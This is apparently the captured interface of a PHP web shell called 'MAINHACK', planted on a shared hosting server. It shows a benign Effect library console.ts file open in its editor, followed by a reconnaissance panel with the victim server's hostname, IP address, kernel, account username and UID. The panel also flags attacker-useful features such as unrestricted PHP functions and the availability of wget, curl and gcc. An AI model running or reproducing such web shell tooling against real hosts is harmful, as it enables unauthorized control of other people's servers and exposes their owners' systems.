[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: console.ts
/* eslint-disable no-console */ import type * as Console from "../../Console.js" import * as Context from "../../Context.js" import * as core from "../core.js" /** @internal */ export const TypeId: Console.TypeId = Symbol.for("effect/Console") as Console.TypeId /** @internal */ export const consoleTag: Context.Tag<Console.Console, Console.Console> = Context.GenericTag<Console.Console>( "effect/Console" ) /** @internal */ export const defaultConsole: Console.Console = { [TypeId]: TypeId, assert(condition, ...args) { return core.sync(() => { console.assert(condition, ...args) }) }, clear: core.sync(() => { console.clear() }), count(label) { return core.sync(() => { console.count(label) }) }, countReset(label) { return core.sync(() => { console.countReset(label) }) }, debug(...args) { return core.sync(() => { console.debug(...args) }) }, dir(item, options) { return core.sync(() => { console.dir(item, options) }) }, dirxml(...args) { return core.sync(() => { console.dirxml(...args) }) }, error(...args) { return core.sync(() => { console.error(...args) }) }, group(options) { return options?.collapsed ? core.sync(() => console.groupCollapsed(options?.label)) : core.sync(() => console.group(options?.label)) }, groupEnd: core.sync(() => { console.groupEnd() }), info(...args) { return core.sync(() => { console.info(...args) }) }, log(...args) { return core.sync(() => { console.log(...args) }) }, table(tabularData, properties) { return core.sync(() => { console.table(tabularData, properties) }) }, time(label) { return core.sync(() => console.time(label)) }, timeEnd(label) { return core.sync(() => console.timeEnd(label)) }, timeLog(label, ...args) { return core.sync(() => { console.timeLog(label, ...args) }) }, trace(...args) { return core.sync(() => { console.trace(...args) }) }, warn(...args) { return core.sync(() => { console.warn(...args) }) }, unsafe: console }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.78 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344